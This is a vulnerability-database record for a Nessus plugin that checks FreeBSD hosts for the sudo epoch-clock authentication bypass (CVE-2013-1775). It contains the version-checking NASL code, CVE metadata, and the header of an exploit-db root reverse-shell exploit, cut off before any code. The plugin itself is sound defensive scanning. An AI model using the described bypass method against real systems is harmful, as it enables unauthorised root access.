FreeBSD : sudo -- Authentication bypass when clock is reset (764344fb-8214-11e2-9273-902b343deec9)
2013-03-04T00:00:00
ID FREEBSD_PKG_764344FB821411E29273902B343DEEC9.NASL Type nessus Reporter This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof. Modified 2013-03-04T00:00:00
Description
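Todd Miller reports:
The flaw may allow someone with physical access to a machine that is
not password-protected to run sudo commands without knowing the
logged-in user's password. On systems where sudo is the principal way of
running commands as root, such as on Ubuntu and Mac OS X, there is a
greater chance that the logged-in user has run sudo before and thus
that an attack would succeed.
For context, the CVE-2013-1775 record describes the flaw as follows: sudo
1.6.0 through 1.7.10p6 and 1.8.0 through 1.8.6p6 let a local or physically
proximate attacker bypass the intended time restrictions and retain
privileges without re-authenticating when the system clock and the user's
sudo time stamp are both set to the epoch.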
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from the FreeBSD VuXML database :
#
# Copyright 2003-2018 Jacques Vidrine and contributors
#
# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,
# HTML, PDF, PostScript, RTF and so forth) with or without modification,
# are permitted provided that the following conditions are met:
# 1. Redistributions of source code (VuXML) must retain the above
# copyright notice, this list of conditions and the following
# disclaimer as the first lines of this file unmodified.
# 2. Redistributions in compiled form (transformed to other DTDs,
# published online in any format, converted to PDF, PostScript,
# RTF and other formats) must reproduce the above copyright
# notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
#
# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS
# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR
# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE
# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
# Registration phase. When `description` is set, the plugin only declares its
# metadata and then leaves through the exit(0) at the end of this block; the
# host check further down in the file is not reached on this path.
if (description)
{
# Plugin identity and revision bookkeeping.
script_id(64987);
script_version("1.9");
script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/06");
# The single CVE this plugin reports on.
script_cve_id("CVE-2013-1775");
script_name(english:"FreeBSD : sudo -- Authentication bypass when clock is reset (764344fb-8214-11e2-9273-902b343deec9)");
# States the method: the finding comes from the host's pkg_info package list,
# not from exercising sudo.
script_summary(english:"Checks for updated package in pkg_info output");
script_set_attribute(
attribute:"synopsis",
value:"The remote FreeBSD host is missing a security-related update."
);
# Advisory text shown with the finding. It is a runtime string and must stay
# exactly as written.
script_set_attribute(
attribute:"description",
value:
"Todd Miller reports :
The flaw may allow someone with physical access to a machine that is
not password-protected to run sudo commands without knowing the logged
in user's password. On systems where sudo is the principal way of
running commands as root, such as on Ubuntu and Mac OS X, there is a
greater chance that the logged in user has run sudo before and thus
that an attack would succeed."
);
# Upstream sudo advisory for this issue. The note below keeps the older
# http:// form of the address that the attribute now gives as https://.
# http://www.sudo.ws/sudo/alerts/epoch_ticket.html
script_set_attribute(
attribute:"see_also",
value:"https://www.sudo.ws/sudo/alerts/epoch_ticket.html"
);
# The attribute value is a shortened link; the note below records the FreeBSD
# VuXML entry it is meant to point at.
# https://vuxml.freebsd.org/freebsd/764344fb-8214-11e2-9273-902b343deec9.html
script_set_attribute(
attribute:"see_also",
value:"http://www.nessus.org/u?6dd8ec6d"
);
script_set_attribute(attribute:"solution", value:"Update the affected package.");
# CVSS v2 base vector: local access vector, medium access complexity, no
# authentication, complete confidentiality/integrity/availability impact.
script_set_cvss_base_vector("CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C");
# Exploit-availability metadata: records that public exploit code exists
# (a Metasploit module and a CANVAS package are named). These are descriptive
# attributes only; nothing in this plugin runs an exploit.
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"metasploit_name", value:'Mac OS X Sudo Password Bypass');
script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
script_set_attribute(attribute:"canvas_package", value:'CANVAS');
# "local": presumably the check works from data collected on the host itself
# (see script_require_keys below) rather than from network probing -- confirm
# against the scanner documentation.
script_set_attribute(attribute:"plugin_type", value:"local");
# Affected package and operating system, as CPE names.
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:freebsd:freebsd:sudo");
script_set_attribute(attribute:"cpe", value:"cpe:/o:freebsd:freebsd");
# Timeline: vulnerability disclosed, patch published, plugin published.
script_set_attribute(attribute:"vuln_publication_date", value:"2013/02/27");
script_set_attribute(attribute:"patch_publication_date", value:"2013/03/01");
script_set_attribute(attribute:"plugin_publication_date", value:"2013/03/04");
# No script_set_attribute() call appears after this point.
script_end_attributes();
# Information-gathering category.
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_family(english:"FreeBSD Local Security Checks");
# Scheduling: ssh_get_info.nasl is declared as a dependency, and the three
# knowledge-base keys are declared as required. Presumably that dependency is
# what populates the Host/* keys -- confirm against ssh_get_info.nasl.
script_dependencies("ssh_get_info.nasl");
script_require_keys("Host/local_checks_enabled", "Host/FreeBSD/release", "Host/FreeBSD/pkg_info");
# Metadata registered; stop here without touching the host.
exit(0);
}
include("audit.inc");
include("freebsd_package.inc");
# Host check. Each guard hands control to audit() with the matching reason
# when a prerequisite is missing from the knowledge base: local checks enabled,
# a FreeBSD release string, and the collected pkg_info package list.
if (!get_kb_item("Host/local_checks_enabled"))
  audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
if (!get_kb_item("Host/FreeBSD/release"))
  audit(AUDIT_OS_NOT, "FreeBSD");
if (!get_kb_item("Host/FreeBSD/pkg_info"))
  audit(AUDIT_PACKAGE_LIST_MISSING);

# Version comparison against the package inventory: report when an installed
# sudo package is older than 1.8.6.p7 (FreeBSD's spelling of the fixed
# release, presumably upstream 1.8.6p7 -- confirm against the VuXML entry).
# pkg_test() comes from freebsd_package.inc, which is not shown here; with
# save_report:TRUE it presumably records the matching package so that
# pkg_report_get() can return it.
# NOTE(review): this looks at package data only. A sudo binary installed
# outside the package system would presumably not be seen by this check, so a
# "not affected" result is a statement about the package list, not about
# every sudo binary on the host.
if (pkg_test(save_report:TRUE, pkg:"sudo<1.8.6.p7"))
{
  # Attach the package report only when the configured verbosity asks for it.
  if (report_verbosity > 0)
  {
    security_warning(port:0, extra:pkg_report_get());
  }
  else
  {
    security_warning(0);
  }
  exit(0);
}
else
{
  # No matching package: record the host as not affected.
  audit(AUDIT_HOST_NOT, "affected");
}
{"id": "FREEBSD_PKG_764344FB821411E29273902B343DEEC9.NASL", "bulletinFamily": "scanner", "title": "FreeBSD : sudo -- Authentication bypass when clock is reset (764344fb-8214-11e2-9273-902b343deec9)", "description": "Todd Miller reports :\n\nThe flaw may allow someone with physical access to a machine that is\nnot password-protected to run sudo commands without knowing the logged\nin user's password. On systems where sudo is the principal way of\nrunning commands as root, such as on Ubuntu and Mac OS X, there is a\ngreater chance that the logged in user has run sudo before and thus\nthat an attack would succeed.", "published": "2013-03-04T00:00:00", "modified": "2013-03-04T00:00:00", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}, "href": "https://www.tenable.com/plugins/nessus/64987", "reporter": "This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://www.sudo.ws/sudo/alerts/epoch_ticket.html", "http://www.nessus.org/u?6dd8ec6d"], "cvelist": ["CVE-2013-1775"], "type": "nessus", "lastseen": "2021-01-07T10:45:48", "edition": 23, "viewCount": 6, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-1775"]}, {"type": "ubuntu", "idList": ["USN-1754-1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:122965", "PACKETSTORM:123032"]}, {"type": "canvas", "idList": ["SUDO_TIMESTAMP"]}, {"type": "zdt", "idList": ["1337DAY-ID-21166"]}, {"type": "exploitdb", "idList": ["EDB-ID:27944", "EDB-ID:27965"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/OSX/LOCAL/SUDO_PASSWORD_BYPASS/", "MSF:EXPLOIT/OSX/LOCAL/SUDO_PASSWORD_BYPASS"]}, {"type": "threatpost", "idList": ["THREATPOST:F7D745AB279D28510E91229D1CA48DC0", "THREATPOST:4FCE977F9517BD5F5952F684C88CEBE0"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:14630", "SECURITYVULNS:DOC:29109", "SECURITYVULNS:VULN:12913", "SECURITYVULNS:DOC:32390"]}, {"type": "thn", "idList": 
["THN:7BDF45E62E28D5D2D535B9AE55F8A825"]}, {"type": "openvas", "idList": ["OPENVAS:865477", "OPENVAS:871085", "OPENVAS:1361412562310841349", "OPENVAS:841349", "OPENVAS:1361412562310123520", "OPENVAS:1361412562310865484", "OPENVAS:1361412562310871048", "OPENVAS:1361412562310865477", "OPENVAS:865484", "OPENVAS:871048"]}, {"type": "seebug", "idList": ["SSV:81531"]}, {"type": "freebsd", "idList": ["764344FB-8214-11E2-9273-902B343DEEC9"]}, {"type": "nessus", "idList": ["OPENSUSE-2013-221.NASL", "REDHAT-RHSA-2013-1353.NASL", "SL_20131121_SUDO_ON_SL6_X.NASL", "UBUNTU_USN-1754-1.NASL", "SL_20130930_SUDO_ON_SL5_X.NASL", "ORACLELINUX_ELSA-2013-1353.NASL", "FEDORA_2013-3297.NASL", "ALA_ALAS-2013-259.NASL", "FEDORA_2013-3270.NASL", "SOLARIS11_SUDO_20130611.NASL"]}, {"type": "slackware", "idList": ["SSA-2013-065-01"]}, {"type": "debian", "idList": ["DEBIAN:DSA-2642-1:282D9"]}, {"type": "fedora", "idList": ["FEDORA:510B521DE6", "FEDORA:25778215CD"]}, {"type": "centos", "idList": ["CESA-2013:1701", "CESA-2013:1353"]}, {"type": "oraclelinux", "idList": ["ELSA-2013-1353", "ELSA-2013-1701"]}, {"type": "redhat", "idList": ["RHSA-2013:1701", "RHSA-2013:1527", "RHSA-2013:1353"]}, {"type": "amazon", "idList": ["ALAS-2013-259"]}, {"type": "gentoo", "idList": ["GLSA-201401-23"]}], "modified": "2021-01-07T10:45:48", "rev": 2}, "score": {"value": 6.7, "vector": "NONE", "modified": "2021-01-07T10:45:48", "rev": 2}, "vulnersScore": 6.7}, "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. 
Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(64987);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2013-1775\");\n\n script_name(english:\"FreeBSD : sudo -- Authentication bypass when clock is reset (764344fb-8214-11e2-9273-902b343deec9)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Todd Miller reports :\n\nThe 
flaw may allow someone with physical access to a machine that is\nnot password-protected to run sudo commands without knowing the logged\nin user's password. On systems where sudo is the principal way of\nrunning commands as root, such as on Ubuntu and Mac OS X, there is a\ngreater chance that the logged in user has run sudo before and thus\nthat an attack would succeed.\"\n );\n # http://www.sudo.ws/sudo/alerts/epoch_ticket.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.sudo.ws/sudo/alerts/epoch_ticket.html\"\n );\n # https://vuxml.freebsd.org/freebsd/764344fb-8214-11e2-9273-902b343deec9.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6dd8ec6d\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Mac OS X Sudo Password Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:sudo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/02/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/03/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/03/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 
and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"sudo<1.8.6.p7\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "naslFamily": "FreeBSD Local Security Checks", "pluginID": "64987", "cpe": ["p-cpe:/a:freebsd:freebsd:sudo", "cpe:/o:freebsd:freebsd"], "scheme": null}
{"cve": [{"lastseen": "2020-12-09T19:52:39", "description": "sudo 1.6.0 through 1.7.10p6 and sudo 1.8.0 through 1.8.6p6 allows local users or physically proximate attackers to bypass intended time restrictions and retain privileges without re-authenticating by setting the system clock and sudo user timestamp to the epoch.", "edition": 5, "cvss3": {}, "published": "2013-03-05T21:38:00", "title": "CVE-2013-1775", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1775"], "modified": "2016-11-28T19:08:00", "cpe": ["cpe:/o:apple:mac_os_x:10.10.4", "cpe:/a:todd_miller:sudo:1.7.9p1", "cpe:/a:todd_miller:sudo:1.6.5", "cpe:/a:todd_miller:sudo:1.7.2p6", "cpe:/a:todd_miller:sudo:1.7.2p2", "cpe:/a:todd_miller:sudo:1.7.4p2", "cpe:/a:todd_miller:sudo:1.7.2p5", "cpe:/a:todd_miller:sudo:1.7.0", "cpe:/a:todd_miller:sudo:1.7.6p2", "cpe:/a:todd_miller:sudo:1.8.6p5", "cpe:/a:todd_miller:sudo:1.7.4p5", "cpe:/a:todd_miller:sudo:1.6.9p21", "cpe:/a:todd_miller:sudo:1.8.4p4", "cpe:/a:todd_miller:sudo:1.8.6p6", "cpe:/a:todd_miller:sudo:1.6.9p23", "cpe:/a:todd_miller:sudo:1.6.7", "cpe:/a:todd_miller:sudo:1.6.9p22", "cpe:/a:todd_miller:sudo:1.7.2p7", "cpe:/a:todd_miller:sudo:1.8.6p3", "cpe:/a:todd_miller:sudo:1.8.3", "cpe:/a:todd_miller:sudo:1.8.1p2", "cpe:/a:todd_miller:sudo:1.6.6", "cpe:/a:todd_miller:sudo:1.7.8p2", "cpe:/a:todd_miller:sudo:1.7.10p4", "cpe:/a:todd_miller:sudo:1.8.1p1", "cpe:/a:todd_miller:sudo:1.7.4", "cpe:/a:todd_miller:sudo:1.7.5", "cpe:/a:todd_miller:sudo:1.8.6p4", 
"cpe:/a:todd_miller:sudo:1.6.4", "cpe:/a:todd_miller:sudo:1.7.4p1", "cpe:/a:todd_miller:sudo:1.7.10", "cpe:/a:todd_miller:sudo:1.7.10p2", "cpe:/a:todd_miller:sudo:1.7.1", "cpe:/a:todd_miller:sudo:1.8.3p1", "cpe:/a:todd_miller:sudo:1.6.3_p7", "cpe:/a:todd_miller:sudo:1.8.0", "cpe:/a:todd_miller:sudo:1.7.2p4", "cpe:/a:todd_miller:sudo:1.6.2p3", "cpe:/a:todd_miller:sudo:1.7.4p6", "cpe:/a:todd_miller:sudo:1.7.10p1", "cpe:/a:todd_miller:sudo:1.8.4", "cpe:/a:todd_miller:sudo:1.6.7p5", "cpe:/a:todd_miller:sudo:1.6.1", "cpe:/a:todd_miller:sudo:1.7.2", "cpe:/a:todd_miller:sudo:1.6.8", "cpe:/a:todd_miller:sudo:1.7.10p6", "cpe:/a:todd_miller:sudo:1.8.5", "cpe:/a:todd_miller:sudo:1.8.6p1", "cpe:/a:todd_miller:sudo:1.6.8p12", "cpe:/a:todd_miller:sudo:1.6.9", "cpe:/a:todd_miller:sudo:1.8.5p1", "cpe:/a:todd_miller:sudo:1.8.4p5", "cpe:/a:todd_miller:sudo:1.7.3b1", "cpe:/a:todd_miller:sudo:1.8.5p3", "cpe:/a:todd_miller:sudo:1.7.10p5", "cpe:/a:todd_miller:sudo:1.8.2", "cpe:/a:todd_miller:sudo:1.7.2p3", "cpe:/a:todd_miller:sudo:1.6.2", "cpe:/a:todd_miller:sudo:1.7.10p3", "cpe:/a:todd_miller:sudo:1.7.8", "cpe:/a:todd_miller:sudo:1.8.4p3", "cpe:/a:todd_miller:sudo:1.8.1", "cpe:/a:todd_miller:sudo:1.8.6p2", "cpe:/a:todd_miller:sudo:1.7.8p1", "cpe:/a:todd_miller:sudo:1.8.5p2", "cpe:/a:todd_miller:sudo:1.6.9p20", "cpe:/a:todd_miller:sudo:1.8.4p2", "cpe:/a:todd_miller:sudo:1.7.2p1", "cpe:/a:todd_miller:sudo:1.7.6p1", "cpe:/a:todd_miller:sudo:1.6.3", "cpe:/a:todd_miller:sudo:1.7.9", "cpe:/a:todd_miller:sudo:1.8.6", "cpe:/a:todd_miller:sudo:1.8.4p1", "cpe:/a:todd_miller:sudo:1.6.4p2", "cpe:/a:todd_miller:sudo:1.7.4p4", "cpe:/a:todd_miller:sudo:1.7.6", "cpe:/a:todd_miller:sudo:1.7.4p3", "cpe:/a:todd_miller:sudo:1.7.7", "cpe:/a:todd_miller:sudo:1.8.3p2", "cpe:/a:todd_miller:sudo:1.6"], "id": "CVE-2013-1775", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1775", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": 
["cpe:2.3:a:todd_miller:sudo:1.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.6.9p21:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.7.9p1:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.7.10p1:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.7.9:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.7.2p2:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.8.5p1:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.7.6p1:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.8.2:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.6.9p23:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.7.4p3:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.7.10p3:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.6.3_p7:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.7.4p5:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.6.8:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.8.4p4:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.6.2p3:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.7.2p6:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.6.6:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.7.10p5:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.8.4p5:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.8.6p4:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.7.4p6:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.6.7:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.7.2p7:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.7.8p1:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.7.10p2:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.8.6p1:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.7.7:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.7.2p1:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.8.1p2:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.6.3:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.7.4p2:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.6.9p22:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.8.6p5:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.10.4:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.7.4p1:*:*:*:*:*:*:*", 
"cpe:2.3:a:todd_miller:sudo:1.8.4p3:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.8.3:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.8.6:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.6.5:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.7.8p2:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.7.10p4:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.7.6:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.7.2p3:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.7.6p2:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.7.3b1:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.8.3p1:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.7.5:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.8.6p2:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.6.8p12:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.6.9p20:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.6.4p2:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.7.10p6:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.8.5:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.7.4:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.8.0:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.6.7p5:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.6.9:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.8.3p2:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.8.6p6:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.7.2p4:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.8.5p2:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.8.4p2:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.8.5p3:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.8.1p1:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.7.2:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.7.4p4:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.8.4p1:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.8.6p3:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.6:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.7.10:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.7.8:*:*:*:*:*:*:*", 
"cpe:2.3:a:todd_miller:sudo:1.7.2p5:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.8.4:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.6.4:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-02-03T07:08:42", "description": "OSX <= 10.8.4 - Local Root Privilege Escalation (py). CVE-2013-1775. Local exploit for osx platform", "published": "2013-08-30T00:00:00", "type": "exploitdb", "title": "OSX <= 10.8.4 - Local Root Privilege Escalation py", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1775"], "modified": "2013-08-30T00:00:00", "id": "EDB-ID:27965", "href": "https://www.exploit-db.com/exploits/27965/", "sourceData": "#!/usr/bin/python\r\n\r\n# Original MSF Module: \r\n# https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/osx/local/sudo_password_bypass.rb\r\n\r\n###################################################################################################\r\n# Exploit Title: OSX <= 10.8.4 Local Root Priv Escalation Root Reverse Shell\r\n# Date: 08-27-2013\r\n# Exploit Author: David Kennedy @ TrustedSec\r\n# Website: https://www.trustedsec.com\r\n# Twitter: @Dave_ReL1K\r\n# Tested On: OSX 10.8.4\r\n#\r\n# Reference: 